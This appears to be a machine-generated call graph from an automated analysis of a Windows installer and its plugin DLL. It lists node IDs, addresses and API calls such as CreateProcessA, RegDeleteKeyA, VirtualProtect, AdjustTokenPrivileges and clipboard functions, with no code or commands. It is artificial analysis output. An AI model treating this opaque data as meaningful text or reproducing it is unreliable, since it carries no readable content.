6ca51ca2 lstrcpyA 4084->4088 4085 6ca51cb6 GlobalFree 4085->4099 4086->4087 4086->4093 4178 6ca51652 GetProcAddress 4087->4178 4088->4099 4089->4093 4174 6ca512b4 4089->4174 4091 6ca5221a 4091->4093 4096 6ca52227 lstrlenA 4091->4096 4092 6ca52047 4177 6ca512a5 GlobalAlloc 4092->4177 4093->4022 4179 6ca51652 GetProcAddress 4096->4179 4097 6ca521db 4097->4091 4107 6ca52204 GetProcAddress 4097->4107 4099->4079 4099->4082 4099->4084 4099->4085 4099->4088 4099->4092 4099->4093 4100 6ca51f89 GlobalFree 4099->4100 4101 6ca520c3 4099->4101 4102 6ca512b4 2 API calls 4099->4102 4103 6ca51cf4 4099->4103 4100->4099 4101->4093 4106 6ca5211c lstrcpyA 4101->4106 4102->4099 4103->4099 4172 6ca515c4 GlobalSize GlobalAlloc 4103->4172 4104 6ca52240 4104->4093 4106->4093 4107->4091 4108 6ca5204f 4108->4022 4113 6ca5239a 4109->4113 4111 6ca524d6 GlobalFree 4112 6ca517c0 4111->4112 4111->4113 4112->4032 4112->4033 4112->4046 4113->4111 4114 6ca52448 GlobalAlloc MultiByteToWideChar 4113->4114 4115 6ca512b4 GlobalAlloc lstrcpynA 4113->4115 4116 6ca52495 4113->4116 4181 6ca5133d 4113->4181 4114->4116 4117 6ca52474 GlobalAlloc CLSIDFromString GlobalFree 4114->4117 4115->4113 4116->4111 4185 6ca526d6 4116->4185 4117->4111 4121 6ca52ada 4119->4121 4120 6ca52b7f EnumWindows 4124 6ca52b9d 4120->4124 4121->4120 4123 6ca52c69 4123->4046 4188 6ca52a74 4124->4188 4126 6ca52354 4125->4126 4127 6ca5235f GlobalAlloc 4126->4127 4128 6ca517b9 4126->4128 4127->4126 4128->4025 4133 6ca52772 4129->4133 4130 6ca52820 4132 6ca52826 GlobalSize 4130->4132 4134 6ca52830 4130->4134 4131 6ca5280d GlobalAlloc 4131->4134 4132->4134 4133->4130 4133->4131 4134->4050 4136 6ca52d5e 4135->4136 4137 6ca52d9e GlobalFree 4136->4137 4192 6ca512a5 GlobalAlloc 4138->4192 4140 6ca52604 StringFromGUID2 WideCharToMultiByte 4146 6ca52574 4140->4146 4141 6ca525f3 lstrcpynA 4141->4146 4142 6ca52628 WideCharToMultiByte 4142->4146 4143 6ca52649 wsprintfA 4143->4146 4144 6ca5266d GlobalFree 4144->4146 4145 6ca526a7 GlobalFree 4145->4038 4146->4140 4146->4141 4146->4142 4146->4143 4146->4144 4146->4145 4147 6ca512f6 2 API calls 4146->4147 4193 6ca51361 4146->4193 4147->4146 4197 6ca512a5 GlobalAlloc 4149->4197 4151 6ca515ee 4152 6ca515fb 2 API calls 4151->4152 4153 6ca515f8 4152->4153 4154 6ca512f6 4153->4154 4155 6ca512ff GlobalAlloc lstrcpynA 4154->4155 4156 6ca51338 GlobalFree 4154->4156 4155->4156 4156->4044 4158 6ca51634 lstrcpyA 4157->4158 4159 6ca51607 wsprintfA 4157->4159 4162 6ca5164d 4158->4162 4159->4162 4162->4051 4164 6ca5187f 4163->4164 4165 6ca5253c 4163->4165 4164->4058 4164->4059 4165->4164 4166 6ca52555 GlobalFree 4165->4166 4166->4165 4168 6ca512f6 2 API calls 4167->4168 4169 6ca51593 4168->4169 4169->4052 4170->4077 4171->4099 4173 6ca515e2 4172->4173 4173->4103 4180 6ca512a5 GlobalAlloc 4174->4180 4176 6ca512c3 lstrcpynA 4176->4093 4177->4108 4178->4097 4179->4104 4180->4176 4182 6ca51344 4181->4182 4183 6ca512b4 2 API calls 4182->4183 4184 6ca5135f 4183->4184 4184->4113 4186 6ca526e4 VirtualAlloc 4185->4186 4187 6ca5273a 4185->4187 4186->4187 4187->4116 4189 6ca52a7f 4188->4189 4190 6ca52a84 GetLastError 4189->4190 4191 6ca52a8f 4189->4191 4190->4191 4191->4123 4192->4146 4194 6ca51389 4193->4194 4195 6ca5136a 4193->4195 4194->4146 4195->4194 4196 6ca51370 lstrcpyA 4195->4196 4196->4194 4197->4151 5074 402e4a 5075 402e72 5074->5075 5076 402e59 SetTimer 5074->5076 5077 402ec7 5075->5077 5078 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5075->5078 5076->5075 5078->5077 4205 40244e 4206 402480 4205->4206 4207 402455 4205->4207 4208 402c5e 21 API calls 4206->4208 4209 402c9e 21 API calls 4207->4209 4211 402487 4208->4211 4210 40245c 4209->4210 4212 402466 4210->4212 4215 402494 4210->4215 4217 402d1c 4211->4217 4214 402c5e 21 API calls 4212->4214 4216 40246d RegDeleteValueA RegCloseKey 4214->4216 4216->4215 4218 402d28 4217->4218 4219 402d2f 4217->4219 4218->4215 4219->4218 4221 402d60 4219->4221 4222 406113 RegOpenKeyExA 4221->4222 4223 402d8e 4222->4223 4224 402e43 4223->4224 4225 402d98 4223->4225 4224->4218 4226 402dc1 4225->4226 4227 402d9e RegEnumValueA 4225->4227 4228 402e28 RegCloseKey 4226->4228 4229 402dfd RegEnumKeyA 4226->4229 4230 402e06 RegCloseKey 4226->4230 4233 402d60 6 API calls 4226->4233 4227->4226 4227->4228 4228->4224 4229->4226 4229->4230 4231 4066b5 5 API calls 4230->4231 4232 402e16 4231->4232 4234 402e38 4232->4234 4235 402e1a RegDeleteKeyA 4232->4235 4233->4226 4234->4224 4235->4224 5082 4027cf 5083 402c5e 21 API calls 5082->5083 5084 4027d6 FindFirstFileA 5083->5084 5085 4027f9 5084->5085 5089 4027e9 5084->5089 5090 4061eb wsprintfA 5085->5090 5087 402800 5091 40628d lstrcpynA 5087->5091 5090->5087 5091->5089 5092 401c53 5093 402c3c 21 API calls 5092->5093 5094 401c5a 5093->5094 5095 402c3c 21 API calls 5094->5095 5096 401c67 5095->5096 5097 401c7c 5096->5097 5098 402c5e 21 API calls 5096->5098 5099 401c8c 5097->5099 5102 402c5e 21 API calls 5097->5102 5098->5097 5100 401ce3 5099->5100 5101 401c97 5099->5101 5104 402c5e 21 API calls 5100->5104 5103 402c3c 21 API calls 5101->5103 5102->5099 5105 401c9c 5103->5105 5106 401ce8 5104->5106 5107 402c3c 21 API calls 5105->5107 5108 402c5e 21 API calls 5106->5108 5109 401ca8 5107->5109 5110 401cf1 FindWindowExA 5108->5110 5111 401cd3 SendMessageA 5109->5111 5112 401cb5 SendMessageTimeoutA 5109->5112 5113 401d0f 5110->5113 5111->5113 5112->5113 5114 402653 5115 402658 5114->5115 5116 40266c 5114->5116 5117 402c3c 21 API calls 5115->5117 5118 402c5e 21 API calls 5116->5118 5119 402661 5117->5119 5120 402673 lstrlenA 5118->5120 5121 405ec7 WriteFile 5119->5121 5122 402695 5119->5122 5120->5119 5121->5122 4378 6ca529b1 4379 6ca52a01 4378->4379 4380 6ca529c1 VirtualProtect 4378->4380 4380->4379 5123 403a54 5124 403a5f 5123->5124 5125 403a63 5124->5125 5126 403a66 GlobalAlloc 5124->5126 5126->5125 4381 4014d6 4386 402c3c 4381->4386 4383 4014dc Sleep 4385 402aea 4383->4385 4387 406320 21 API calls 4386->4387 4388 402c51 4387->4388 4388->4383 4389 401957 4390 401959 4389->4390 4391 402c5e 21 API calls 4390->4391 4392 40195e 4391->4392 4395 405a4f 4392->4395 4435 405d0d 4395->4435 4398 405a77 DeleteFileA 4400 401967 4398->4400 4399 405a8e 4401 405bc6 4399->4401 4449 40628d lstrcpynA 4399->4449 4401->4400 4406 406620 2 API calls 4401->4406 4403 405ab4 4404 405ac7 4403->4404 4405 405aba lstrcatA 4403->4405 4450 405c66 lstrlenA 4404->4450 4407 405acd 4405->4407 4409 405be0 4406->4409 4410 405adb lstrcatA 4407->4410 4412 405ae6 lstrlenA FindFirstFileA 4407->4412 4409->4400 4411 405be4 4409->4411 4410->4412 4463 405c1f lstrlenA CharPrevA 4411->4463 4414 405bbc 4412->4414 4433 405b0a 4412->4433 4414->4401 4415 405c4a CharNextA 4415->4433 4417 405a07 5 API calls 4418 405bf6 4417->4418 4419 405c10 4418->4419 4420 405bfa 4418->4420 4421 4053d1 28 API calls 4419->4421 4420->4400 4425 4053d1 28 API calls 4420->4425 4421->4400 4422 405b9b FindNextFileA 4424 405bb3 FindClose 4422->4424 4422->4433 4424->4414 4426 405c07 4425->4426 4428 406066 40 API calls 4426->4428 4430 405c0e 4428->4430 4429 405a4f 64 API calls 4429->4433 4430->4400 4431 4053d1 28 API calls 4431->4422 4432 4053d1 28 API calls 4432->4433 4433->4415 4433->4422 4433->4429 4433->4431 4433->4432 4434 406066 40 API calls 4433->4434 4454 40628d lstrcpynA 4433->4454 4455 405a07 4433->4455 4434->4433 4466 40628d lstrcpynA 4435->4466 4437 405d1e 4467 405cb8 CharNextA CharNextA 4437->4467 4440 405a6f 4440->4398 4440->4399 4441 406587 5 API calls 4447 405d34 4441->4447 4442 405d5f lstrlenA 4443 405d6a 4442->4443 4442->4447 4445 405c1f 3 API calls 4443->4445 4444 406620 2 API calls 4444->4447 4446 405d6f GetFileAttributesA 4445->4446 4446->4440 4447->4440 4447->4442 4447->4444 4448 405c66 2 API calls 4447->4448 4448->4442 4449->4403 4451 405c73 4450->4451 4452 405c84 4451->4452 4453 405c78 CharPrevA 4451->4453 4452->4407 4453->4451 4453->4452 4454->4433 4473 405dfb GetFileAttributesA 4455->4473 4458 405a22 RemoveDirectoryA 4461 405a30 4458->4461 4459 405a2a DeleteFileA 4459->4461 4460 405a34 4460->4433 4461->4460 4462 405a40 SetFileAttributesA 4461->4462 4462->4460 4464 405bea 4463->4464 4465 405c39 lstrcatA 4463->4465 4464->4417 4465->4464 4466->4437 4468 405cd3 4467->4468 4471 405ce3 4467->4471 4470 405cde CharNextA 4468->4470 4468->4471 4469 405d03 4469->4440 4469->4441 4470->4469 4471->4469 4472 405c4a CharNextA 4471->4472 4472->4471 4474 405a13 4473->4474 4475 405e0d SetFileAttributesA 4473->4475 4474->4458 4474->4459 4474->4460 4475->4474 4476 4033d8 SetErrorMode GetVersionExA 4477 40342a GetVersionExA 4476->4477 4479 403469 4476->4479 4478 403446 4477->4478 4477->4479 4478->4479 4480 4034ed 4479->4480 4481 4066b5 5 API calls 4479->4481 4482 406647 3 API calls 4480->4482 4481->4480 4483 403503 lstrlenA 4482->4483 4483->4480 4484 403513 4483->4484 4485 4066b5 5 API calls 4484->4485 4486 40351a 4485->4486 4487 4066b5 5 API calls 4486->4487 4488 403521 4487->4488 4489 4066b5 5 API calls 4488->4489 4490 40352d #17 OleInitialize SHGetFileInfoA 4489->4490 4565 40628d lstrcpynA 4490->4565 4493 40357b GetCommandLineA 4566 40628d lstrcpynA 4493->4566 4495 40358d 4496 405c4a CharNextA 4495->4496 4497 4035b4 CharNextA 4496->4497 4502 4035c3 4497->4502 4498 403689 4499 40369d GetTempPathA 4498->4499 4567 4033a7 4499->4567 4501 4036b5 4503 4036b9 GetWindowsDirectoryA lstrcatA 4501->4503 4504 40370f DeleteFileA 4501->4504 4502->4498 4505 405c4a CharNextA 4502->4505 4509 40368b 4502->4509 4507 4033a7 12 API calls 4503->4507 4577 402f31 GetTickCount GetModuleFileNameA 4504->4577 4505->4502 4508 4036d5 4507->4508 4508->4504 4511 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4508->4511 4661 40628d lstrcpynA 4509->4661 4515 4033a7 12 API calls 4511->4515 4512 403722 4513 4037a7 4512->4513 4517 405c4a CharNextA 4512->4517 4520 4037b7 4512->4520 4605 403a96 4513->4605 4519 403707 4515->4519 4521 40373c 4517->4521 4519->4504 4519->4520 4664 4039bc 4520->4664 4530 403781 4521->4530 4531 4037e6 4521->4531 4522 4037d1 4671 4059a3 4522->4671 4523 403928 4524 403930 GetCurrentProcess OpenProcessToken 4523->4524 4525 4039a6 ExitProcess 4523->4525 4528 403976 4524->4528 4529 403947 LookupPrivilegeValueA AdjustTokenPrivileges 4524->4529 4533 4066b5 5 API calls 4528->4533 4529->4528 4534 405d0d 18 API calls 4530->4534 4675 40590e 4531->4675 4536 40397d 4533->4536 4537 40378d 4534->4537 4539 403992 ExitWindowsEx 4536->4539 4541 40399f 4536->4541 4537->4520 4662 40628d lstrcpynA 4537->4662 4539->4525 4539->4541 4689 40140b 4541->4689 4543 403803 4544 40381b 4543->4544 4679 40628d lstrcpynA 4543->4679 4549 403839 wsprintfA 4544->4549 4562 403867 4544->4562 4546 40379c 4663 40628d lstrcpynA 4546->4663 4550 406320 21 API calls 4549->4550 4550->4544 4553 403877 GetFileAttributesA 4556 403883 DeleteFileA 4553->4556 4553->4562 4554 4038af SetCurrentDirectoryA 4555 406066 40 API calls 4554->4555 4557 4038be CopyFileA 4555->4557 4556->4562 4557->4520 4557->4562 4558 405a4f 71 API calls 4558->4562 4559 406066 40 API calls 4559->4562 4560 406320 21 API calls 4560->4562 4562->4520 4562->4544 4562->4549 4562->4553 4562->4554 4562->4558 4562->4559 4562->4560 4563 403918 CloseHandle 4562->4563 4564 406620 2 API calls 4562->4564 4680 405897 CreateDirectoryA 4562->4680 4683 4058f1 CreateDirectoryA 4562->4683 4686 405926 CreateProcessA 4562->4686 4563->4520 4564->4562 4565->4493 4566->4495 4568 406587 5 API calls 4567->4568 4570 4033b3 4568->4570 4569 4033bd 4569->4501 4570->4569 4571 405c1f 3 API calls 4570->4571 4572 4033c5 4571->4572 4573 4058f1 2 API calls 4572->4573 4574 4033cb 4573->4574 4692 405e4f 4574->4692 4696 405e20 GetFileAttributesA CreateFileA 4577->4696 4579 402f71 4597 402f81 4579->4597 4697 40628d lstrcpynA 4579->4697 4581 402f97 4582 405c66 2 API calls 4581->4582 4583 402f9d 4582->4583 4698 40628d lstrcpynA 4583->4698 4585 402fa8 GetFileSize 4590 402fbf 4585->4590 4601 4030a2 4585->4601 4587 4030ab 4589 4030db GlobalAlloc 4587->4589 4587->4597 4734 403390 SetFilePointer 4587->4734 4710 403390 SetFilePointer 4589->4710 4592 40310e 4590->4592 4590->4597 4600 402ecd 6 API calls 4590->4600 4590->4601 4731 40337a 4590->4731 4594 402ecd 6 API calls 4592->4594 4594->4597 4595 4030c4 4598 40337a ReadFile 4595->4598 4596 4030f6 4711 403168 4596->4711 4597->4512 4602 4030cf 4598->4602 4600->4590 4699 402ecd 4601->4699 4602->4589 4602->4597 4603 403102 4603->4597 4603->4603 4604 40313f SetFilePointer 4603->4604 4604->4597 4606 4066b5 5 API calls 4605->4606 4607 403aaa 4606->4607 4608 403ab0 4607->4608 4609 403ac2 4607->4609 4748 4061eb wsprintfA 4608->4748 4610 406174 3 API calls 4609->4610 4611 403aed 4610->4611 4612 403b0b lstrcatA 4611->4612 4614 406174 3 API calls 4611->4614 4615 403ac0 4612->4615 4614->4612 4740 403d5b 4615->4740 4618 405d0d 18 API calls 4619 403b3d 4618->4619 4620 403bc6 4619->4620 4622 406174 3 API calls 4619->4622 4621 405d0d 18 API calls 4620->4621 4623 403bcc 4621->4623 4624 403b69 4622->4624 4625 403bdc LoadImageA 4623->4625 4628 406320 21 API calls 4623->4628 4624->4620 4632 403b85 lstrlenA 4624->4632 4636 405c4a CharNextA 4624->4636 4626 403c82 4625->4626 4627 403c03 RegisterClassA 4625->4627 4631 40140b 2 API calls 4626->4631 4629 403c8c 4627->4629 4630 403c39 SystemParametersInfoA CreateWindowExA 4627->4630 4628->4625 4629->4520 4630->4626 4635 403c88 4631->4635 4633 403b93 lstrcmpiA 4632->4633 4634 403bb9 4632->4634 4633->4634 4637 403ba3 GetFileAttributesA 4633->4637 4638 405c1f 3 API calls 4634->4638 4635->4629 4641 403d5b 22 API calls 4635->4641 4639 403b83 4636->4639 4640 403baf 4637->4640 4642 403bbf 4638->4642 4639->4632 4640->4634 4643 405c66 2 API calls 4640->4643 4644 403c99 4641->4644 4749 40628d lstrcpynA 4642->4749 4643->4634 4646 403ca5 ShowWindow 4644->4646 4647 403d28 4644->4647 4649 406647 3 API calls 4646->4649 4648 4054a3 5 API calls 4647->4648 4650 403d2e 4648->4650 4651 403cbd 4649->4651 4652 403d32 4650->4652 4653 403d4a 4650->4653 4654 403ccb GetClassInfoA 4651->4654 4656 406647 3 API calls 4651->4656 4652->4629 4660 40140b 2 API calls 4652->4660 4655 40140b 2 API calls 4653->4655 4657 403cf5 DialogBoxParamA 4654->4657 4658 403cdf GetClassInfoA RegisterClassA 4654->4658 4655->4629 4656->4654 4659 40140b 2 API calls 4657->4659 4658->4657 4659->4629 4660->4629 4661->4499 4662->4546 4663->4513 4665 4039d4 4664->4665 4666 4039c6 CloseHandle 4664->4666 4754 403a01 4665->4754 4666->4665 4669 405a4f 71 API calls 4670 4037bf OleUninitialize 4669->4670 4670->4522 4670->4523 4672 4059b8 4671->4672 4673 4059cc MessageBoxIndirectA 4672->4673 4674 4037de ExitProcess 4672->4674 4673->4674 4676 4066b5 5 API calls 4675->4676 4677 4037eb lstrlenA 4676->4677 4678 40628d lstrcpynA 4677->4678 4678->4543 4679->4544 4681 4058e3 4680->4681 4682 4058e7 GetLastError 4680->4682 4681->4562 4682->4681 4684 405901 4683->4684 4685 405905 GetLastError 4683->4685 4684->4562 4685->4684 4687 405965 4686->4687 4688 405959 CloseHandle 4686->4688 4687->4562 4688->4687 4690 401389 2 API calls 4689->4690 4691 401420 4690->4691 4691->4525 4693 405e5a GetTickCount GetTempFileNameA 4692->4693 4694 4033d6 4693->4694 4695 405e87 4693->4695 4694->4501 4695->4693 4695->4694 4696->4579 4697->4581 4698->4585 4700 402ed6 4699->4700 4701 402eee 4699->4701 4702 402ee6 4700->4702 4703 402edf DestroyWindow 4700->4703 4704 402ef6 4701->4704 4705 402efe GetTickCount 4701->4705 4702->4587 4703->4702 4735 4066f1 4704->4735 4707 402f0c CreateDialogParamA ShowWindow 4705->4707 4708 402f2f 4705->4708 4707->4708 4708->4587 4710->4596 4712 40317e 4711->4712 4713 4031ac 4712->4713 4739 403390 SetFilePointer 4712->4739 4715 40337a ReadFile 4713->4715 4716 4031b7 4715->4716 4717 403313 4716->4717 4718 4031c9 GetTickCount 4716->4718 4720 4032fd 4716->4720 4719 403355 4717->4719 4724 403317 4717->4724 4718->4720 4727 403218 4718->4727 4721 40337a ReadFile 4719->4721 4720->4603 4721->4720 4722 40337a ReadFile 4722->4727 4723 40337a ReadFile 4723->4724 4724->4720 4724->4723 4725 405ec7 WriteFile 4724->4725 4725->4724 4726 40326e GetTickCount 4726->4727 4727->4720 4727->4722 4727->4726 4728 403293 MulDiv wsprintfA 4727->4728 4730 405ec7 WriteFile 4727->4730 4729 4053d1 28 API calls 4728->4729 4729->4727 4730->4727 4732 405e98 ReadFile 4731->4732 4733 40338d 4732->4733 4733->4590 4734->4595 4736 40670e PeekMessageA 4735->4736 4737 406704 DispatchMessageA 4736->4737 4738 402efc 4736->4738 4737->4736 4738->4587 4739->4713 4741 403d6f 4740->4741 4750 4061eb wsprintfA 4741->4750 4743 403de0 4751 403e14 4743->4751 4745 403b1b 4745->4618 4746 403de5 4746->4745 4747 406320 21 API calls 4746->4747 4747->4746 4748->4615 4749->4620 4750->4743 4752 406320 21 API calls 4751->4752 4753 403e22 SetWindowTextA 4752->4753 4753->4746 4755 403a0f 4754->4755 4756 4039d9 4755->4756 4757 403a14 FreeLibrary GlobalFree 4755->4757 4756->4669 4757->4756 4757->4757 4758 402758 4759 40275f 4758->4759 4765 402a6c 4758->4765 4760 402c3c 21 API calls 4759->4760 4761 402766 4760->4761 4762 402775 SetFilePointer 4761->4762 4763 402785 4762->4763 4762->4765 4766 4061eb wsprintfA 4763->4766 4766->4765 5127 6ca5103d 5130 6ca5101b 5127->5130 5137 6ca5154b 5130->5137 5132 6ca51020 5133 6ca51024 5132->5133 5134 6ca51027 GlobalAlloc 5132->5134 5135 6ca51572 3 API calls 5133->5135 5134->5133 5136 6ca5103b 5135->5136 5139 6ca51551 5137->5139 5138 6ca51557 5138->5132 5139->5138 5140 6ca51563 GlobalFree 5139->5140 5140->5132 5141 401e5a GetDC 5142 402c3c 21 API calls 5141->5142 5143 401e6c GetDeviceCaps MulDiv ReleaseDC 5142->5143 5144 402c3c 21 API calls 5143->5144 5145 401e9d 5144->5145 5146 406320 21 API calls 5145->5146 5147 401eda CreateFontIndirectA 5146->5147 5148 40264d 5147->5148 4792 4015e0 4793 402c5e 21 API calls 4792->4793 4794 4015e7 4793->4794 4795 405cb8 4 API calls 4794->4795 4800 4015ef 4795->4800 4796 401649 4797 401677 4796->4797 4798 40164e 4796->4798 4803 401423 28 API calls 4797->4803 4801 401423 28 API calls 4798->4801 4799 405c4a CharNextA 4799->4800 4800->4796 4800->4799 4805 4058f1 2 API calls 4800->4805 4806 40590e 5 API calls 4800->4806 4809 401631 GetFileAttributesA 4800->4809 4810 405897 2 API calls 4800->4810 4802 401655 4801->4802 4811 40628d lstrcpynA 4802->4811 4808 40166f 4803->4808 4805->4800 4806->4800 4807 401660 SetCurrentDirectoryA 4807->4808 4809->4800 4810->4800 4811->4807 5149 4016e0 5150 402c5e 21 API calls 5149->5150 5151 4016e6 GetFullPathNameA 5150->5151 5152 4016fd 5151->5152 5158 40171e 5151->5158 5155 406620 2 API calls 5152->5155 5152->5158 5153 401732 GetShortPathNameA 5154 402aea 5153->5154 5156 40170e 5155->5156 5156->5158 5159 40628d lstrcpynA 5156->5159 5158->5153 5158->5154 5159->5158 5160 404463 lstrcpynA lstrlenA 5161 6ca51000 5162 6ca5101b 5 API calls 5161->5162 5163 6ca51019 5162->5163 4858 405969 ShellExecuteExA 4859 401eea 4860 402c3c 21 API calls 4859->4860 4861 401ef0 4860->4861 4862 402c3c 21 API calls 4861->4862 4863 401efc 4862->4863 4864 401f13 EnableWindow 4863->4864 4865 401f08 ShowWindow 4863->4865 4866 402aea 4864->4866 4865->4866 4867 40176b 4868 402c5e 21 API calls 4867->4868 4869 401772 4868->4869 4870 405e4f 2 API calls 4869->4870 4871 401779 4870->4871 4872 405e4f 2 API calls 4871->4872 4872->4871 5164 40196c 5165 402c5e 21 API calls 5164->5165 5166 401973 lstrlenA 5165->5166 5167 40264d 5166->5167 5168 401ff0 5169 402c5e 21 API calls 5168->5169 5170 401ff7 5169->5170 5171 406620 2 API calls 5170->5171 5172 401ffd 5171->5172 5173 40200f 5172->5173 5175 4061eb wsprintfA 5172->5175 5175->5173 5176 4014f4 SetForegroundWindow 5177 402aea 5176->5177 5178 404778 5179 404788 5178->5179 5180 4047ae 5178->5180 5181 40432d 22 API calls 5179->5181 5182 404394 8 API calls 5180->5182 5184 404795 SetDlgItemTextA 5181->5184 5183 4047ba 5182->5183 5184->5180 4984 40177e 4985 402c5e 21 API calls 4984->4985 4986 401785 4985->4986 4987 4017a3 4986->4987 4988 4017ab 4986->4988 5024 40628d lstrcpynA 4987->5024 5025 40628d lstrcpynA 4988->5025 4991 4017a9 4995 406587 5 API calls 4991->4995 4992 4017b6 4993 405c1f 3 API calls 4992->4993 4994 4017bc lstrcatA 4993->4994 4994->4991 5007 4017c8 4995->5007 4996 401809 4998 405dfb 2 API calls 4996->4998 4997 406620 2 API calls 4997->5007 4998->5007 5000 4017df CompareFileTime 5000->5007 5001 4018a3 5002 4053d1 28 API calls 5001->5002 5004 4018ad 5002->5004 5003 4053d1 28 API calls 5012 40188f 5003->5012 5005 403168 35 API calls 5004->5005 5006 4018c0 5005->5006 5008 4018d4 SetFileTime 5006->5008 5009 4018e6 FindCloseChangeNotification 5006->5009 5007->4996 5007->4997 5007->5000 5007->5001 5010 406320 21 API calls 5007->5010 5015 40628d lstrcpynA 5007->5015 5020 4059a3 MessageBoxIndirectA 5007->5020 5021 40187a 5007->5021 5023 405e20 GetFileAttributesA CreateFileA 5007->5023 5008->5009 5011 4018f7 5009->5011 5009->5012 5010->5007 5013 4018fc 5011->5013 5014 40190f 5011->5014 5016 406320 21 API calls 5013->5016 5017 406320 21 API calls 5014->5017 5015->5007 5018 401904 lstrcatA 5016->5018 5019 401917 5017->5019 5018->5019 5019->5012 5022 4059a3 MessageBoxIndirectA 5019->5022 5020->5007 5021->5003 5021->5012 5022->5012 5023->5007 5024->4991 5025->4992 5185 40167e 5186 402c5e 21 API calls 5185->5186 5187 401684 5186->5187 5188 406620 2 API calls 5187->5188 5189 40168a 5188->5189 5190 40197e 5191 402c3c 21 API calls 5190->5191 5192 401985 5191->5192 5193 402c3c 21 API calls 5192->5193 5194 401992 5193->5194 5195 402c5e 21 API calls 5194->5195 5196 4019a9 lstrlenA 5195->5196 5197 4019b9 5196->5197 5198 4019f9 5197->5198 5202 40628d lstrcpynA 5197->5202 5200 4019e9 5200->5198 5201 4019ee lstrlenA 5200->5201 5201->5198 5202->5200 5203 401000 5204 401037 BeginPaint GetClientRect 5203->5204 5205 40100c DefWindowProcA 5203->5205 5206 4010f3 5204->5206 5210 401179 5205->5210 5208 401073 CreateBrushIndirect FillRect DeleteObject 5206->5208 5209 4010fc 5206->5209 5208->5206 5211 401102 CreateFontIndirectA 5209->5211 5212 401167 EndPaint 5209->5212 5211->5212 5213 401112 6 API calls 5211->5213 5212->5210 5213->5212 5214 401502 5215 401507 5214->5215 5216 40152d 5214->5216 5217 402c3c 21 API calls 5215->5217 5217->5216 5218 401a83 5219 402c3c 21 API calls 5218->5219 5220 401a8c 5219->5220 5221 402c3c 21 API calls 5220->5221 5222 401a33 5221->5222 5223 6ca51661 5224 6ca5154b GlobalFree 5223->5224 5226 6ca51679 5224->5226 5225 6ca516bf GlobalFree 5226->5225 5227 6ca51694 5226->5227 5228 6ca516ab VirtualFree 5226->5228 5227->5225 5228->5225 5229 6ca510e0 5230 6ca51110 5229->5230 5231 6ca5129a GlobalFree 5230->5231 5232 6ca511cd GlobalAlloc 5230->5232 5233 6ca51286 GlobalFree 5230->5233 5234 6ca5133d 2 API calls 5230->5234 5235 6ca51295 5230->5235 5236 6ca512f6 2 API calls 5230->5236 5237 6ca51165 GlobalAlloc 5230->5237 5238 6ca51361 lstrcpyA 5230->5238 5232->5230 5233->5230 5234->5230 5235->5231 5236->5230 5237->5230 5238->5230 5239 401588 5240 402a67 5239->5240 5243 4061eb wsprintfA 5240->5243 5242 402a6c 5243->5242 5244 401b88 5245 402c5e 21 API calls 5244->5245 5246 401b8f 5245->5246 5247 402c3c 21 API calls 5246->5247 5248 401b98 wsprintfA 5247->5248 5249 402aea 5248->5249 5250 401d8a 5251 401d90 5250->5251 5252 401d9d GetDlgItem 5250->5252 5253 402c3c 21 API calls 5251->5253 5254 401d97 5252->5254 5253->5254 5255 402c5e 21 API calls 5254->5255 5257 401dde GetClientRect LoadImageA SendMessageA 5254->5257 5255->5257 5258 401e3f 5257->5258 5260 401e4b 5257->5260 5259 401e44 DeleteObject 5258->5259 5258->5260 5259->5260 5261 40278b 5262 402791 5261->5262 5263 402799 FindClose 5262->5263 5264 402aea 5262->5264 5263->5264 4198 40240d 4199 402c5e 21 API calls 4198->4199 4200 40241e 4199->4200 4201 402c5e 21 API calls 4200->4201 4202 402427 4201->4202 4203 402c5e 21 API calls 4202->4203 4204 402431 GetPrivateProfileStringA 4203->4204 5265 40280d 5266 402c5e 21 API calls 5265->5266 5267 402819 5266->5267 5268 40282f 5267->5268 5270 402c5e 21 API calls 5267->5270 5269 405dfb 2 API calls 5268->5269 5271 402835 5269->5271 5270->5268 5293 405e20 GetFileAttributesA CreateFileA 5271->5293 5273 4028fe 5277 402905 DeleteFileA 5273->5277 5278 402918 5273->5278 5274 402842 5274->5273 5275 4028e6 5274->5275 5276 40285d GlobalAlloc 5274->5276 5280 403168 35 API calls 5275->5280 5276->5275 5279 402876 5276->5279 5277->5278 5294 403390 SetFilePointer 5279->5294 5282 4028f3 CloseHandle 5280->5282 5282->5273 5283 40287c 5284 40337a ReadFile 5283->5284 5285 402885 GlobalAlloc 5284->5285 5286 402895 5285->5286 5287 4028cf 5285->5287 5289 403168 35 API calls 5286->5289 5288 405ec7 WriteFile 5287->5288 5290 4028db GlobalFree 5288->5290 5292 4028a2 5289->5292 5290->5275 5291 4028c6 GlobalFree 5291->5287 5292->5291 5293->5274 5294->5283 4236 40550f 4237 405531 GetDlgItem GetDlgItem GetDlgItem 4236->4237 4238 4056ba 4236->4238 4282 404362 SendMessageA 4237->4282 4240 4056c2 GetDlgItem CreateThread FindCloseChangeNotification 4238->4240 4241 4056ea 4238->4241 4240->4241 4305 4054a3 OleInitialize 4240->4305 4243 405718 4241->4243 4246 405700 ShowWindow ShowWindow 4241->4246 4247 405739 4241->4247 4242 4055a1 4252 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4242->4252 4244 405720 4243->4244 4245 405773 4243->4245 4249 405728 4244->4249 4250 40574c ShowWindow 4244->4250 4245->4247 4259 405780 SendMessageA 4245->4259 4287 404362 SendMessageA 4246->4287 4291 404394 4247->4291 4288 404306 4249->4288 4255 40576c 4250->4255 4256 40575e 4250->4256 4257 405616 4252->4257 4258 4055fa SendMessageA SendMessageA 4252->4258 4254 405745 4264 404306 SendMessageA 4255->4264 4263 4053d1 28 API calls 4256->4263 4260 405629 4257->4260 4261 40561b SendMessageA 4257->4261 4258->4257 4259->4254 4262 405799 CreatePopupMenu 4259->4262 4283 40432d 4260->4283 4261->4260 4265 406320 21 API calls 4262->4265 4263->4255 4264->4245 4267 4057a9 AppendMenuA 4265->4267 4269 4057c7 GetWindowRect 4267->4269 4270 4057da TrackPopupMenu 4267->4270 4268 405639 4271 405642 ShowWindow 4268->4271 4272 405676 GetDlgItem SendMessageA 4268->4272 4269->4270 4270->4254 4273 4057f6 4270->4273 4274 405665 4271->4274 4275 405658 ShowWindow 4271->4275 4272->4254 4276 40569d SendMessageA SendMessageA 4272->4276 4277 405815 SendMessageA 4273->4277 4286 404362 SendMessageA 4274->4286 4275->4274 4276->4254 4277->4277 4278 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 